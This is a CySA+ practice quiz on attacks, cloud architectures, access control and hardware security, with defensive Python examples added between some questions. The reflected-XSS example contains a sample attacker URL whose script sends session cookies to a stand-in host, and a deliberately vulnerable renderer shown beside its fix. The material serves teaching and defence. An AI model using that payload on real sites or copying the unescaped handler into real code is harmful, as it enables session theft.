Title of test:
Cysa_ 02 AIO Part2

AIO practice Part2

Adrian B

Creation Date:

Category: Computers

Number of questions: 28
Mila is executing an attack where the technique is to perform a one-time login attempt on multiple hosts on a network using the same credentials to avoid account lockouts. What is this type of attack? A. Man-in-the-middle attack B. Password spraying C. Credential stuffing D. Impersonation.
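Added example (not part of the quiz): detection logic for the pattern the question describes. Password spraying spreads failures across many accounts with at most one attempt each, so a per-account lockout never fires; a brute-force attack hammers one account. The log lines and the key=value format are constructed for this example, and the thresholds are assumptions to tune against your own lockout policy.

```python
import re
from collections import defaultdict

# Constructed sample authentication log (not real data); the key=value format
# is an assumption made for this example.
SAMPLE_LOG = """\
2024-03-01T09:00:01 src=203.0.113.7 user=alice result=FAIL
2024-03-01T09:00:02 src=203.0.113.7 user=bob result=FAIL
2024-03-01T09:00:03 src=203.0.113.7 user=carol result=FAIL
2024-03-01T09:00:04 src=203.0.113.7 user=dave result=FAIL
2024-03-01T09:00:05 src=203.0.113.7 user=erin result=SUCCESS
2024-03-01T09:01:00 src=198.51.100.9 user=frank result=FAIL
2024-03-01T09:01:01 src=198.51.100.9 user=frank result=FAIL
2024-03-01T09:01:02 src=198.51.100.9 user=frank result=FAIL
2024-03-01T09:01:03 src=198.51.100.9 user=frank result=FAIL
2024-03-01T09:01:04 src=198.51.100.9 user=frank result=FAIL
2024-03-01T09:02:00 src=192.0.2.5 user=alice result=SUCCESS
"""

LINE_RE = re.compile(r"src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)")


def parse(log_text):
    """Turn log lines into dicts with src, user and result; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def classify_sources(events, min_users=4, brute_force_attempts=5):
    """Label each source IP.

    spraying:    failures spread across >= min_users accounts, at most one
                 failure per account (keeps every account under the lockout
                 threshold, which is the whole point of the technique)
    brute_force: >= brute_force_attempts failures against a single account
    normal:      anything else
    The thresholds are illustrative assumptions.
    """
    fails = defaultdict(lambda: defaultdict(int))
    for e in events:
        fails[e["src"]]  # ensure sources with only successes are listed too
        if e["result"] == "FAIL":
            fails[e["src"]][e["user"]] += 1
    verdicts = {}
    for src, per_user in fails.items():
        distinct = len(per_user)
        peak = max(per_user.values(), default=0)
        if distinct >= min_users and peak == 1:
            verdicts[src] = "spraying"
        elif peak >= brute_force_attempts:
            verdicts[src] = "brute_force"
        else:
            verdicts[src] = "normal"
    return verdicts


def successes_from_spraying(events, **thresholds):
    """(src, user) pairs that logged in successfully from a spraying source:
    the accounts most likely to have accepted the sprayed password."""
    verdicts = classify_sources(events, **thresholds)
    return {(e["src"], e["user"]) for e in events
            if e["result"] == "SUCCESS" and verdicts.get(e["src"]) == "spraying"}
```

Note the asymmetry this exposes: a lockout policy stops the brute-force source but not the spraying one, so detection has to pivot on the source and on the count of distinct accounts, not on failures per account.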
A senior cybersecurity analyst is explaining the difference between stack-based and heap-based overflow attacks to a new cybersecurity analyst. Which of the following characteristics of overflow attacks are true? (Choose two.) A. Most heap overflows are not exploitable because memory is not being overwritten. B. Heap overflows are more difficult to implement because heap is dynamically allocated. C. The stack is a type of data structure that operates on the principle of “first in, first out.” D. Stack-based overflows overwrite key areas of memory with too much data.
In the following image, an attacker sends malicious code to an unsuspecting user. The browser executes the code because it thinks it came from a trusted source. The malicious code can access cookies, session tokens, or other sensitive information retained by the browser and used with the site. Which type of attack is this? A. Reflective cross-site scripting B. DOM cross-site scripting C. Structured cross-site scripting D. Persistent cross-site scripting.
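Added example (not from the quiz): the reflected variant in miniature, as the server-side handler that makes it possible and its hardened form. The attacker URL, the host names and the handler functions are constructed for this example. The payload arrives in the request and is echoed straight back into the page, which is what distinguishes reflected from persistent (stored) XSS; the fix, output encoding for the HTML context, is the same in both cases.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed attacker URL (hosts are illustrative): the q parameter carries a
# script that ships document.cookie to a server the attacker controls.
ATTACK_URL = (
    "https://shop.example/search?q=%3Cscript%3Edocument.location%3D%27"
    "https%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url, name):
    """Extract one query parameter the way a web framework would (percent-decoded)."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_search_vulnerable(q):
    # Reflects the untrusted parameter straight into HTML. The browser cannot tell
    # attacker-supplied markup from the site's own, so the script runs with the
    # site's origin and can read its cookies.
    return f"<h1>Results for {q}</h1>"


def render_search_safe(q):
    # Output-encode for the HTML text context: '<' becomes '&lt;', quotes become
    # entities, so the payload is displayed as text and never parsed as markup.
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def contains_script_element(page):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()
```

The encoding is context specific: html.escape is right for element text and quoted attribute values, but not for a value dropped into a JavaScript string or a URL, which need their own encoders.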
While performing a vulnerability assessment outbrief to the customer technical staff, Julie describes a dereferencing vulnerability discovered in the systems tested. She explains that a dereferencing vulnerability is a vulnerability that A. arises when an application uses user-supplied input to access objects directly B. occurs when a system attempts to perform two or more operations at the same time C. occurs when software attempts to access a stored value in memory that does not exist D. causes detailed internal error messages to be revealed to the user.
A major factor in securing our networks is using the appropriate network architecture. Which network architecture decouples data-forwarding functions from the decision-making functions, allowing for holistic and adaptive control of how data moves around the network? A. Virtual private cloud B. Serverless C. Software defined D. Physical.
Some organizations find benefit in an architecture where applications are hosted by a third-party service and are broken up into individual functions, allowing the business to focus purely on the functions that can be invoked and scaled individually. This is the architecture used by AWS Lambda and Microsoft Azure Functions. Which architecture does this describe? A. Virtual private cloud B. Serverless C. Software defined D. Physical.
Which of the following technologies allows multiple applications to execute in isolated user spaces, share the same operating system kernel, and run on various types of infrastructure without needing to adjust for each? A. Containerization B. Virtualization C. Hypervisor D. Virtual desktop infrastructure.
Many organizations operate based on the thought that assigning privileged access is an all-or-nothing proposition, but it doesn’t have to be that way. Which of the following techniques/principles address this issue to help organizations limit overuse of privileges? (Choose two.) A. Least privilege B. Multifactor authentication C. Federated access control D. Role-based access control.
Access control methods are increasingly critical to thwarting attackers’ efforts to gain a foothold into your system and/or network. One method typically provides a very granular ability because it can filter access based on more factors, including username, role, organization, security clearance, time of access, location of data, current threat level, creation date, resource owner, filename, and data sensitivity. Which of the following access control methods provides this granularity? A. Role based B. Attribute based C. Mandatory D. Discretionary.
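Added example (not from the quiz): a small attribute-based policy evaluator beside a role-based check, to make the granularity concrete. The subjects, resources, rules and thresholds (business hours, clearance ranks, the "high" threat level restriction) are assumptions made for this example, not any product's policy language.

```python
from dataclasses import dataclass

CLEARANCE_RANK = {"public": 0, "confidential": 1, "secret": 2, "top_secret": 3}


@dataclass(frozen=True)
class Subject:
    username: str
    role: str
    clearance: str
    org: str


@dataclass(frozen=True)
class Resource:
    filename: str
    sensitivity: str
    owner: str
    org: str


@dataclass(frozen=True)
class Context:
    hour: int          # local hour of the access attempt, 0-23
    threat_level: str  # "low" | "elevated" | "high"


# RBAC for comparison: the role alone decides, so an analyst gets the same
# answer at 3 a.m. under a high threat level as at noon on a quiet day.
RBAC_MAX_SENSITIVITY = {"analyst": "secret", "contractor": "confidential",
                        "admin": "top_secret"}


def rbac_allows(subject, resource):
    allowed = RBAC_MAX_SENSITIVITY.get(subject.role, "public")
    return CLEARANCE_RANK[resource.sensitivity] <= CLEARANCE_RANK[allowed]


# ABAC: each rule is a predicate over (subject, resource, context). Deny by
# default; permit only when every rule holds. Rules are illustrative assumptions.
def clearance_rule(s, r, c):
    return CLEARANCE_RANK[s.clearance] >= CLEARANCE_RANK[r.sensitivity]


def org_rule(s, r, c):
    return s.org == r.org or s.username == r.owner


def time_rule(s, r, c):
    # Off-hours access to anything above confidential is limited to the SOC.
    in_hours = 8 <= c.hour < 18
    return in_hours or s.role == "soc_analyst" or CLEARANCE_RANK[r.sensitivity] <= 1


def threat_rule(s, r, c):
    # Under a high threat level, secret-and-above data is restricted to its owner.
    if c.threat_level != "high":
        return True
    return CLEARANCE_RANK[r.sensitivity] < 2 or s.username == r.owner


ABAC_RULES = [("clearance", clearance_rule), ("org", org_rule),
              ("time", time_rule), ("threat", threat_rule)]


def abac_decide(subject, resource, context):
    """Return ("permit", []) or ("deny", [names of the rules that failed])."""
    failed = [name for name, rule in ABAC_RULES if not rule(subject, resource, context)]
    return ("permit" if not failed else "deny", failed)
```

Returning the failed rule names is deliberate: an ABAC denial that only says "no" is painful to troubleshoot, and the audit trail should record which attribute blocked the request.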
In an effort to close the gap between attackers’ advantages and defenders’ disadvantages, organizations such as the National Security Agency, Department of Homeland Security, and Defense Advanced Research Projects Agency have been developing active cyber defenses. One concept spawned by this effort is a constantly evolving attack surface, such as deploying false endpoint decoys, servers, and devices. Additionally, the approach includes constantly changing the services, IP addresses, and ports being used. What is this approach known as? A. Containerization B. Moving target defense C. Software-defined networking D. Cyber threat hunting.
Which of the following activities is not a standard part of digital certificate management activities? A. Dynamically selecting a certificate hash algorithm B. Acquiring certificates from the certificate authority C. Reporting compromised certificates to the Revocation Authority D. Protecting private keys.
Garth is developing a customer solution that needs a secure method to connect two sites to share resources and also a secure method for employees to perform remote work. Which protocols support the solution needed to meet the customer requirements? (Choose two.) A. SSL B. SSH C. L2TP/IPSec D. OpenVPN.
Troy has been tasked with ensuring cybersecurity is integrated into the development of a new web application from the beginning. Troy has discovered a trove of useful application security resources from a popular organization. What is the name of this organization? A. SysAdmin, Audit, Network, and Security Institute B. National Institute of Standards and Technology C. Center for Internet Security D. Open Web Application Security Project.
Software is engineered to separate processing, data management, and presentation functions into a client/server n-tier architecture. Which of the following statements is true regarding software assurance in an n-tier architecture? A. It is more difficult to secure software because each tier handles data differently. B. Securing software is less difficult because security is distributed among the different tiers. C. There is no difference because the software assurance standards apply the same to all architectures. D. From a software assurance perspective, each tier is independent and therefore doesn’t affect the others.
Robert is auditing a client network and specifically confirming the system enforces the use of complex and long passwords, encrypts passwords both at rest and in transit, disables login after a set number of failed login attempts, and reduces the ability to enumerate username/password by displaying a standard failed login response such as “invalid username and/or password.” Robert is auditing the network specifically for which of the following top weaknesses? A. Injection flaws B. Sensitive data exposure C. Broken access control D. Broken authentication.
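Added example (not from the quiz): the controls Robert is checking, implemented in one small in-memory login service. Passwords are stored only as salted PBKDF2 hashes, the account locks after a fixed number of failures, the login path returns the same generic message for an unknown user, a wrong password and a locked account, and it burns the same hashing work for unknown users so timing does not leak whether the username exists. Encryption in transit is left to TLS and is outside this snippet. Class and method names, the iteration count and the thresholds are assumptions.

```python
import hashlib
import hmac
import os

MAX_FAILED_ATTEMPTS = 5
MIN_PASSWORD_LENGTH = 12
GENERIC_FAILURE = "invalid username and/or password"


class UserStore:
    """In-memory user database. `iterations` is the PBKDF2 work factor; the
    default is a sensible 2024 value for SHA-256, lower it only in tests."""

    def __init__(self, iterations=600_000):
        self.iterations = iterations
        self._users = {}

    def _derive(self, password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.iterations)

    def add_user(self, username, password):
        if len(password) < MIN_PASSWORD_LENGTH:
            raise ValueError(f"password must be at least {MIN_PASSWORD_LENGTH} characters")
        salt = os.urandom(16)
        # Only the salt and the derived hash are kept: the password itself is
        # never stored, so there is nothing to "encrypt at rest" beyond this.
        self._users[username] = {"salt": salt, "hash": self._derive(password, salt),
                                 "failed": 0, "locked": False}

    def is_locked(self, username):
        return self._users[username]["locked"]

    def login(self, username, password):
        record = self._users.get(username)
        if record is None:
            # Same amount of work as a real check, so response time does not
            # reveal that the username is unknown.
            self._derive(password, bytes(16))
            return False, GENERIC_FAILURE
        if record["locked"]:
            # Same message as a bad password: the lockout is recorded server
            # side for the SOC, not announced to whoever is guessing.
            return False, GENERIC_FAILURE
        if hmac.compare_digest(self._derive(password, record["salt"]), record["hash"]):
            record["failed"] = 0
            return True, "ok"
        record["failed"] += 1
        if record["failed"] >= MAX_FAILED_ATTEMPTS:
            record["locked"] = True
        return False, GENERIC_FAILURE
```

The per-account counter is what a password-spraying attacker deliberately stays under, so in production pair it with a per-source rate limit and with alerting on failures spread across many accounts.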
Debbie is integrating a standard for exchanging authentication and authorization identities between security domains using an XML-based protocol to pass information using security tokens. Debbie is implementing which standard? A. Simple Object Access Protocol B. Security Assertion Markup Language C. Representational State Transfer D. Microservices.
Andrea needs to set up a protocol to interchange data between web service applications. The requirements state an XML-based solution that is platform independent and works on the HTTP protocol. Which of the following meets the requirements for Andrea’s project? A. Simple Object Access Protocol B. Security Assertion Markup Language C. Representational State Transfer D. Microservices.
Which architectural style, among the most commonly used in web services, is used in a client/server architecture and utilizes a uniform and predefined set of stateless operations to provide interoperability on the Web? A. Simple Object Access Protocol B. Security Assertion Markup Language C. Representational State Transfer D. Microservices.
Jerry has been assigned the task of breaking up a huge monolithic application into a collection of small, modular services capable of being deployed independently but loosely coupled so they can still work together. Which architectural style meets Jerry’s needs? A. Simple Object Access Protocol B. Security Assertion Markup Language C. Representational State Transfer D. Microservices.
IBM has developed a type of one-time programmable memory that can be modified once to either disable access to certain functionality on a chip or prevent reverting back to a previous version of firmware. What is this called? A. Atomic execution B. Trusted firmware updates C. eFuse D. Anti-tamper.
The secure boot feature of UEFI is self-contained and inflexible, stopping the platform from booting if a signature is invalid. When this is not practical, there is an alternative, more flexible solution that does not stop the platform from booting but does compute and record the hash of the object so it can be retrieved later to find out what objects were encountered. What is this alternative approach known as? A. Trusted Platform Module B. Trusted firmware updates C. Hardware security module D. Measured boot and attestation.
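Added example (not from the quiz): the record-and-report behaviour the question describes, simulated in software. Each boot object is hashed, the hash is folded into a running register the way a TPM extends a PCR (new = SHA-256(old || measurement)), and the name and hash are appended to an event log; boot never halts. A verifier later replays the log against the quoted register value and compares it with a known-good log to name exactly which object changed. The component names and byte strings are constructed; a real TPM would also sign the quote, which is omitted here.

```python
import hashlib


def sha256(data):
    return hashlib.sha256(data).digest()


def extend(pcr, measurement):
    # PCR extend: the new value depends on the old one, so measurements can be
    # appended but never removed or reordered without changing the final value.
    return sha256(pcr + measurement)


def measured_boot(components):
    """components: list of (name, bytes). Returns (final_pcr, event_log).
    Unlike secure boot, nothing is rejected: every object is measured and logged."""
    pcr = bytes(32)  # PCRs start at all zeros on power-on
    log = []
    for name, blob in components:
        m = sha256(blob)
        log.append((name, m.hex()))
        pcr = extend(pcr, m)
    return pcr, log


def replay_log(log):
    """Recompute the PCR from the event log alone."""
    pcr = bytes(32)
    for _, m_hex in log:
        pcr = extend(pcr, bytes.fromhex(m_hex))
    return pcr


def attest(quoted_pcr, log, golden_log):
    """Verifier side. Returns (ok, findings).
    1. Replay the log: if it does not reproduce the quoted PCR, the log was edited.
    2. Compare each recorded object with the known-good log to name what changed."""
    if replay_log(log) != quoted_pcr:
        return False, ["event log does not reproduce quoted PCR"]
    findings = [name for (name, m), (_, gm) in zip(log, golden_log) if m != gm]
    if len(log) != len(golden_log):
        findings.append("number of measured objects differs")
    return not findings, findings
```

The practical difference from secure boot is visible in attest(): a modified kernel still boots, but the remote verifier can refuse it network access or a decryption key, and the log tells the responder which object to pull for analysis.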
What is the technology called that protects against software-based attacks by using hardware to create an environment for applications to be run and protected from all other software on the system, thus preventing the success of malicious software attacks? A. Secure boot B. Trusted execution C. eFuse D. Measured boot and attestation.
The Department of Defense is implementing data-at-rest encryption to the maximum extent possible, but they mostly rely on IT and program managers to implement this requirement across their portfolios. The DoD could mandate use of existing technology that automatically, without user interaction, continuously encrypts data on storage devices. This technology, which uses a unique and random data encryption key, is known as what? A. Bus encryption B. Full disk encryption C. Endpoint encryption D. Self-encrypting drives.
Daniel is working on a project and needs a solution that can provide quick, safe, and secure data transactions and verification. This solution should use specialized hardware that is well tested and certified, utilizes a security-oriented operating system, separates business logic from cryptologic calls, and is able to store and manage cryptographic keys to prevent attacks. Daniel’s project must be able to add this technology to existing systems. Which of the following meets Daniel’s criteria? A. Trusted Platform Module B. Unified Extensible Firmware Interface C. Hardware security module D. eFuse.
A new system design specification requires the hardware to allow programmers to designate special regions in memory to be encrypted and private for a given process. These regions must be dynamically decrypted by the CPU while in use, preventing any unauthorized process, including the operating system or hypervisor, from accessing plaintext stored there. Which of the following meets this design specification requirement? A. Hardware security module B. Processor security extensions C. Trusted Platform Module D. Measured boot and attestation.
Which of the following is not a characteristic of hardware root of trust? A. Contains the keys used for cryptographic functions B. Enables a secure boot process C. Prevents interruption and interference for sections of software D. Secure by design.
What category of technology is designed to address previously inherent security weaknesses in hardware solutions and includes hardware encryption to keep everything but security-related processes from accessing certain protected parts of hardware and to protect data in use? A. eFuse technology B. Measured boot and attestation C. Bus encryption D. Secure processing.
Which type of environment only runs code that has been appropriately authorized and checked by other authorized code? This requires a secure boot feature to check the integrity and authenticity of all operating system components, and it ensures that no one has tampered with the operating system’s code when the device is powered off. A. Trusted execution B. Secure boot C. eFuse D. Measured boot and attestation.